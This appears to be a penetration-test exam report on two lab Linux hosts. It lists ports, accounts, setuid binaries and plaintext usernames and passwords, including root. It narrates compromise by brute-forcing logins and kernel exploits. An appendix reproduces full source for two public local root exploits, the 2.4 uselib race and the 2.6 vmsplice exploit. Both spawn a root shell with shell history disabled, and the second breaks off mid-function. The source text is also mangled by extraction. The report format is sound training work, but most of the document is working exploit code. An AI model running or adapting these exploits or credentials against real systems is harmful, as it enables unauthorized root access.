ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl

Username/password: user/digital, cptvm1/windows, cptvm2/linux, r00t/expl0ited,


root/cavalry
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

L. Ultimate goal
i. Cptvm1 and ctpvm2 hosts compromised
The initial access to the cptvm1 was obtained by brute force password
guessing of the user account. After gaining basic access to the
cptvm1 host, the cptvm1 and cptvm2 user accounts were brute
force password attacked. This provided basic access to the cptvm2
hosts. The cptvm1 host was then compromised via a VMA exploit.
Next, the cptvm2 host was compromised via a vmsplice exploit.
Finally, the root passwords were cracked.
ii. Passwords for root accounts on cptvm1 and cptvm2
The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin

M. Lessons learned
i. Searching exploit sites
The quality of the exploits and exploit information varies radically
between sites. For example, the milw0rm.com site has good quality
code but limited information on the background of the exploit. In
contrast, the www.securityfocus.com site has more extensive
information about an exploit but may only list Exploit code has been
published instead of actual exploit code.
With such a wide foot print for searches in mind, a site like
secwatch.org should be the preferred solution. However, it was found
that certain searches don't perform well via secwatch.org.

The use of a single site to complete exploit research isn't going to be a


successful approach at this time.
ii. Attack vectors
All of the articles that I have read and the individuals that I have
spoken with lateley state that the majority of the future exploits will be
found outside of the operating system. With this in mind, I focused
my search on items surrounding the kernel but waited to research the
kernel exploits until the end. This proved to be the exactly opposite
approach that was required for this examination.
Full research into the vulnerabilities of a target prior to attempting to
execute any exploits is key. If this approach had been adhered to
more, a full review of all of the vulnerabilities would have yielded the
kernel exploits as the top contenders. This would have save quite a bit
of time compiling, debugging and testing unsuccessful exploits.

5. Appendix
A. Source code for the Kernel 2.4 VMA exploit
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu <timhsu at chroot.org> Jan 2005.
*
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include

<stdio.h>
<stdlib.h>
<string.h>
<fcntl.h>
<unistd.h>
<errno.h>
<sched.h>
<syscall.h>
<limits.h>

#include
#include
#include
#include
#include

<sys/types.h>
<sys/wait.h>
<sys/time.h>
<sys/mman.h>
<sys/sysinfo.h>

#include <linux/elf.h>
#include <linux/linkage.h>
#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>
#define str(s) #s
#define xstr(s) str(s)
#define MREMAP_MAYMOVE

//
temp lib location
#define LIBNAME
"/tmp/_elf_lib"
//
shell name
#define
SHELL

"/bin/bash"

//
time delta to detect race
#define RACEDELTA 5000
//
if you have more deadbabes in memory, change this
#define MAGIC
0xdeadbabe
//
do not touch
#define
SLAB_THRSH
128
#define
SLAB_PER_CHLD(INT_MAX - 1)
#define LIB_SIZE
( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES

( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE ( LDT_ENTRIES-1 )


#define SEL_GATE
( (ENTRY_GATE<<3)|0x07 )
#define ENTRY_LCS
#define SEL_LCS

( ENTRY_GATE-2 )
( (ENTRY_LCS<<3)|0x04 )

#define ENTRY_LDS
#define SEL_LDS

( ENTRY_GATE-1 )
( (ENTRY_LDS<<3)|0x04 )

#define kB
#define MB
#define GB

* 1024
* 1024 kB
* 1024 MB

#define TMPLEN
#define PGD_SIZE

256
( PAGE_SIZE*1024 )

extern char **environ;


static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];
static pid_t consume_pid;
static volatile int
val = 0,
go = 0,
finish = 0,
scnt = 0,
ccnt=0,

delta = 0,
delta_max = RACEDELTA,
map_flags = PROT_WRITE|PROT_READ;
static int
fstop=0,
silent=0,
pidx,
pnum=0,
smp_max=0,
smp,
wtime=2,
cpid,
uid,
task_size,
old_esp,
lib_addr,
map_count=0,
map_base=0,
map_addr,
addr_min,
addr_max,
vma_start,
vma_end,
max_page;
static struct timeval tm1, tm2;
static char *myenv[] = {"TERM=vt100",
"HISTFILE=/dev/null",
NULL};
static char hellc0de[] =
"\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75
\x65\x52\x00";
static char *pagemap, *libname=LIBNAME, *shellname=SHELL;

#define
#define
#define
#define
#define
#define
#define
#define

__NR_sys_gettimeofday
__NR_gettimeofday
__NR_sys_sched_yield
__NR_sched_yield
__NR_sys_madvise __NR_madvise
__NR_sys_uselib
__NR_uselib
__NR_sys_mmap2
__NR_mmap2
__NR_sys_munmap
__NR_munmap
__NR_sys_mprotect __NR_mprotect
__NR_sys_mremap
__NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int,


f);
inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);
inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );
inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);

inline _syscall1(int, sys_uselib, char*, l);


inline _syscall0(void, sys_sched_yield);
int consume_memory()
{
struct sysinfo info;
char *vmem;
sysinfo(&info);
vmem = malloc(info.freeram);
if (vmem == NULL)
{
perror("malloc");
return -1;
}
memset(vmem, 0x90, info.freeram);
}
inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
int r;
r=t2->tv_sec - t1->tv_sec;
r*=1000000;
r+=t2->tv_usec - t1->tv_usec;
return r;
}
void fatal(const char *message, int critical)
{
int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);
if(!errno) {
fprintf(stdout, "\n[-] FAILED: %s ", message);
} else {
fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,
(char*) (strerror(errno)) );
}
if(critical)
printf("\nCRITICAL, entering endless loop");
printf("\n");
fflush(stdout);
unlink(libname);
kill(cpid, SIGKILL);
for(;;) kill(0, sig);
}
//
try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
finish=1;
for(;;) {
errno = 0;
//
check if raced:
recheck:
if(!go) sys_sched_yield();

sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if(!smp_max && delta < (unsigned)delta_max) goto recheck;
smp = smp_max;
//
check if lib VMAs exist as expected under race condition
recheck2:
val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
if(val) continue;
errno = 0;
val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if( !val || (val<0 && errno!=ENOMEM) ) continue;
//

SMP?
smp--;
if(smp>=0) goto recheck2;

//

recheck race
if(!go) continue;
finish++;

//

we need to free one vm_area_struct for mmap to work


val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
if(val) fatal("mprotect", 0);
val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(-1==val) fatal("mmap2 race", 0);
printf("\n[+] race won maps=%d", map_count); fflush(stdout);
kill(consume_pid, SIGKILL);
_exit(0);
}

return 0;
}
int callme_1()
{
return val++;
}
inline int valid_ptr(unsigned ptr)
{
return ptr>=task_size && ptr<addr_min-16;
}
inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;
if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
t=(unsigned*)p[3];
if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
return 1;
}
return 0;
}
asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;

//

find & reset uids


while(addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid)
addr++;
addr[0] = addr[1] = addr[2] = addr[3] = 0;
addr[4] = addr[5] = addr[6] = addr[7] = 0;

//

find & correct VMA


for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {
if( validate_vma(addr, vma_start, vma_end) ) {
addr[1] = task_size - PAGE_SIZE;
addr[2] = task_size;
break;
}
}

}
void kcode(void);
//
CPL0 code mostly stolen from cliph
void __kcode(void)
{
asm(
"kcode:
"
pusha
\n"
"
pushl %es
\n"
"
pushl %ds
\n"
"
movl
$(" xstr(SEL_LDS) ") ,%edx \n"
"
movl
%edx,%es
\n"
"
movl
%edx,%ds
\n"
"
movl
$0xffffe000,%eax
\n"
"
andl
%esp,%eax
\n"
"
pushl %eax
\n"
"
call
kernel_code
\n"
"
addl
$4, %esp
\n"
"
popl
%ds
\n"
"
popl
%es
\n"
"
popa
\n"
"
lret
\n"
);
}

\n"

int callme_2()
{
return val + task_size + addr_min;
}
void sigfailed(int v)
{
ccnt++;
fatal("lcall", 1);
}
//
modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;
printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);

unlink(libname);
r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
if(r) fatal("mprotect 1", 1);
//

check if really LDT


v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );
signal(SIGSEGV, sigfailed);
r = *v;
if(r != MAGIC) {
printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);
fatal("find LDT", 1);
}

//

yeah, setup CPL0 gate


v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);
v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]);
fflush(stdout);
//

setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
v[1] = 0x00cf9b00;
v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
v[1] = 0x00cf9300;

//

reprotect to get only one big VMA


r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);
if(r) fatal("mprotect 2", 1);

//

CPL0 transition
sys_sched_yield();
val = callme_1() + callme_2();
asm("lcall $" xstr(SEL_GATE) ",$0x0");
//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
if (getuid()==0) {
printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);
} else {
printf("\n[-] uid change failed" ); fflush(stdout);
sigfailed(0);
}
signal(SIGTERM, SIG_IGN);
kill(0, SIGTERM);
setresuid(0, 0, 0);
execl(shellname, "sh", NULL);
fatal("execl", 0);

}
void scan_mm_finish();
void scan_mm_start();
//
kernel page table scan code
void scan_mm()
{
map_addr -= PAGE_SIZE;
if(map_addr <= (unsigned)addr_min)
scan_mm_start();
scnt=0;
val = *(int*)map_addr;

scan_mm_finish();
}
void scan_mm_finish()
{
retry:
__asm__("movl%0, %%esp" : :"m"(old_esp) );
if(scnt) {
pagemap[pidx] ^= 1;
}
else {
sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
}
pidx--;
scan_mm();
goto retry;
}
//
make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;
//static struct user_desc l;
pnum++;
if(pnum==1) {
pidx = max_page-1;
}
else if(pnum==2) {
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES-1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}
else if(pnum==3) {
npg=0;
for(pidx=0; pidx<=max_page-1; pidx++) {
if(pagemap[pidx]) {
npg++;
}
else if(npg == LDT_PAGES) {
npg=0;
try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
} else {
npg=0;
}
}
fatal("find LDT", 1);
}
//

save context & scan page table


__asm__("movl%%esp, %0" : :"m"(old_esp) );
map_addr = addr_max;
scan_mm();

//
return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
char x1[20];
fp = fopen("/proc/slabinfo", "r");
if(!fp)
fatal("get_slab_objs: fopen", 0);
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a = -1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
&d, &d, &d, &d);
} while (strcmp(name, sn));
close(fileno(fp));
fclose(fp);
return c == 7 ? a - u : -1;
}
long memmaped_size = 0;
//
leave one object in the SLAB
inline void prepare_slab()
{
int *r;
map_addr -= PAGE_SIZE;
map_count++;
map_flags ^= PROT_READ;
r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED == r) {
printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024);
fatal("try again", 0);
}
memmaped_size += PAGE_SIZE;
*r = map_addr;
}
//
sig handlers
void segvcnt(int v)
{
scnt++;
scan_mm_finish();
}
//
child reap
void reaper(int v)
{
ccnt++;
waitpid(0, &v, WNOHANG|WUNTRACED);
}
//
sometimes I get the VMAs in reversed order...
//
so just use anyone of the two but take care about the flags
void check_vma_flags();

void vreversed(int v)
{
map_flags = 0;
check_vma_flags();
}
void check_vma_flags()
{
if(map_flags) {
__asm__("movl%%esp, %0" : :"m"(old_esp) );
} else {
__asm__("movl%0, %%esp" : :"m"(old_esp) );
goto out;
}
signal(SIGSEGV, vreversed);
val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
}
//
use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";
//
//

printf("\n
cat /proc/%d/maps", getpid() ); fflush(stdout);
helper clone
finish=0; ccnt=0;
sz = sizeof(cstack) / sizeof(cstack[0]);
cpid = clone(&raceme, (void*) &cstack[sz-16],
CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
if(-1==cpid) fatal("clone", 0);

//

synchronize threads
while(!finish) sys_sched_yield();
finish=0;
if(!silent) {
printf("\n"); fflush(stdout);
}

//

try to hit the kmalloc race


for(;;) {
r = get_slab_objs("vm_area_struct");
//printf("\nfree slab = %d\n",r);
while(r != 1 && r > 0) {
prepare_slab();
r--;
}
sys_gettimeofday(&tm1, NULL);
go = 1;
r=sys_uselib(libname);
go = 0;
if(r) fatal("uselib", 0);
if(finish) break;

//

wipe lib VMAs and try again


r = sys_munmap(lib_addr, LIB_SIZE);
if(r) fatal("munmap lib", 0);
if(ccnt) goto failed;

if( !silent && !(pcnt%64) ) {


printf("\r
Wait... %c", smiley[ (pcnt/64)%8 ]);
fflush(stdout);
}
pcnt++;
}
//

seems we raced, free mem


r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
if(r) fatal("munmap 1", 0);
r = sys_munmap(lib_addr, PAGE_SIZE);
if(r) fatal("munmap 2", 0);

//

relax kswapd
sys_gettimeofday(&tm1, NULL);
for(;;) {
sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if( wtime*1000000U <= (unsigned)delta ) break;
}

//

we need to check the PROT_EXEC flag


map_flags = PROT_EXEC;
check_vma_flags();
if(!map_flags) {
printf("\n
VMAs reversed"); fflush(stdout);
}

//

write protect brk's VMA to fool vm_enough_memory()


r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
PROT_READ|map_flags);
if(-1==r) { fatal("mprotect brk", 0); }

//

this will finally make the big VMA...


sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;
expand:
r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if(r) fatal("madvise", 0);
r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
if(-1==r) {
if(0==sz) {
fatal("mremap: expand VMA", 0);
} else {
sz -= PAGE_SIZE;
goto expand;
}
}
vma_start = lib_addr + PAGE_SIZE;
vma_end = vma_start + sz + 2*PAGE_SIZE;
printf("\n
expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);
fflush(stdout);
//

try to figure kernel layout


signal(SIGCHLD, reaper);
signal(SIGSEGV, segvcnt);
signal(SIGBUS, segvcnt);
scan_mm_start();

failed:
printf("failed:\n");
fatal("try again", 0);

}
//
make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;
//

make our elf library


umask(022);
unlink(libname);
fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);
memset(&eh, 0, sizeof(eh) );

//

elf exec header


memcpy(eh.e_ident, ELFMAG, SELFMAG);
eh.e_type = ET_EXEC;
eh.e_machine = EM_386;
eh.e_phentsize = sizeof(struct elf_phdr);
eh.e_phnum = 1;
eh.e_phoff = sizeof(eh);
write(fd, &eh, sizeof(eh) );

//

section header:
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = lib_addr;
eph.p_memsz = LIB_SIZE;
eph.p_flags = PF_W|PF_R|PF_X;
write(fd, &eph, sizeof(eph) );

//

execable code
lseek(fd, 4096, SEEK_SET);
memset(tmpbuf, 0x90, sizeof(tmpbuf) );
write(fd, &tmpbuf, sizeof(tmpbuf) );
close(fd);

}
//
move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;
old_esp &= ~(PAGE_SIZE-1);
old_esp -= PAGE_SIZE;
task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
r = sys_munmap(old_esp, task_size-old_esp);
if(r) fatal("unmap stack", 0);
//

setup rt env
uid = getuid();
lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
if(map_base)
map_addr = map_base;
else
map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",

old_esp, task_size, map_base); fflush(stdout);


//

check physical mem & prepare


sysinfo(&si);
addr_min = task_size + si.totalram;
addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
addr_max = addr_min + si.totalram;
if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max <
(unsigned)addr_min)
addr_max = 0xffffd000;
printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);
max_page = (addr_max - addr_min) / PAGE_SIZE;
pagemap = malloc( max_page + 32 );
if(!pagemap) fatal("malloc pagemap", 1);
memset(pagemap, 0, max_page + 32);
//

go go
make_lib();
exploitme();

}
//
move stack down #1
void prepare()
{
unsigned p=0;
environ = myenv;
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );
if(-1==p) fatal("mmap2 stack", 0);
p += STACK_SIZE - 64;
__asm__("movl%%esp, %0
\n"
"movl %1, %%esp
\n"
: : "m"(old_esp), "m"(p)
);
prepare_finish();
}
void chldcnt(int v)
{
ccnt++;
}
//
alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;
__asm__("movl%%esp, %0" : : "m"(old_esp) );
old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
old_esp = map_base? map_base : old_esp;
for(;;) {
if(left<=0)
left = get_slab_objs("vm_area_struct");
if(left <= SLAB_THRSH)
break;

left--;
map_flags ^= PROT_READ;
old_esp -= PAGE_SIZE;
r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
if(MAP_FAILED == r)
break;
if(c>SLAB_PER_CHLD)
break;
if( (c%1024)==0 ) {
if(!c) printf("\n");
printf("\r
child %d VMAs %d", val, c);
fflush(stdout);
}
c++;
}
printf("\r
child %d VMAs %d", val, c);
fflush(stdout);
kill(getppid(), SIGUSR1);
for(;;) pause();
}
//
empty SLAB caches
void wipe_slab()
{
signal(SIGUSR1, chldcnt);
printf("\n[+] SLAB cleanup"); fflush(stdout);
for(;;) {
ccnt=0;
val++;
cpid = fork();
if(!cpid)
do_wipe();
while(!ccnt) sys_sched_yield();
if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
break;
}
signal(SIGUSR1, SIG_DFL);
}
void usage(char *n)
{
printf("\nUsage: %s\t-f forced stop\n", n);
printf("\t\t-s silent mode\n");
printf("\t\t-c command to run\n");
printf("\t\t-n SMP iterations\n");
printf("\t\t-d race delta us\n");
printf("\t\t-w wait time seconds\n");
printf("\t\t-l alternate lib name\n");
printf("\t\t-a alternate addr hex\n");
printf("\n");
_exit(1);
}
//
give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;

while(ac) {
r = getopt(ac, av, "n:l:a:w:c:d:fsh");
if(r<0) break;
switch(r) {
case 'f' :
fstop = 1;
break;
case 's' :
silent = 1;
break;
case 'n' :
smp_max = atoi(optarg);
break;
case 'd':
if(1!=sscanf(optarg, "%u", &delta_max) || delta_max >
100000u )
fatal("bad delta value", 0);
break;
case 'w' :
wtime = atoi(optarg);
if(wtime<0) fatal("bad wait value", 0);
break;
case 'l' :
libname = strdup(optarg);
break;
case 'c' :
shellname = strdup(optarg);
break;
case 'a' :
if(1!=sscanf(optarg, "%x", &map_base))
fatal("bad addr value", 0);
map_base &= ~(PGD_SIZE-1);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
consume_pid = fork();

//

if (consume_pid == 0)
{
consume_memory();
pause();
return 0;
}
basic setup
uid = getuid();
setpgrp();
wipe_slab();
prepare();

return 0;
}

// milw0rm.com [2005-01-27]

B. Source code for the Kernel 2.6 vmsplice exploit


/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define
#define
#define
#define
#define

PIPE_BUFFERS
16
PG_compound14
uint
unsigned int
static_inline
static inline __attribute__((always_inline))
STACK(x)
(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void
char

exit_code();
exit_stack[1024 * 1024];

void
{

die(char *msg, int err)


printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);

#if defined (__i386__)


#ifndef __NR_vmsplice
#define __NR_vmsplice
#endif

316

#define USER_CS
#define USER_SS
#define USER_FL

0x73
0x7b
0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice
#endif

278

#define USER_CS
#define USER_SS
#define USER_FL

0x23
0x2b
0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice
__NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl)
#endif

syscall(__NR_vmsplice, (fd), (io), (nr), (fl))

static uint uid, gid;


void
{

kernel_code()
int
uint

i;
*p = get_current();

for (i = 0; i < 1024-13; i++) {


if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void
{

exit_code()
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);

}
int

main(int argc, char *argv[])

{
int
pi[2];
size_t
map_size;
char *
map_addr;
struct iovec iov;
struct page *pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
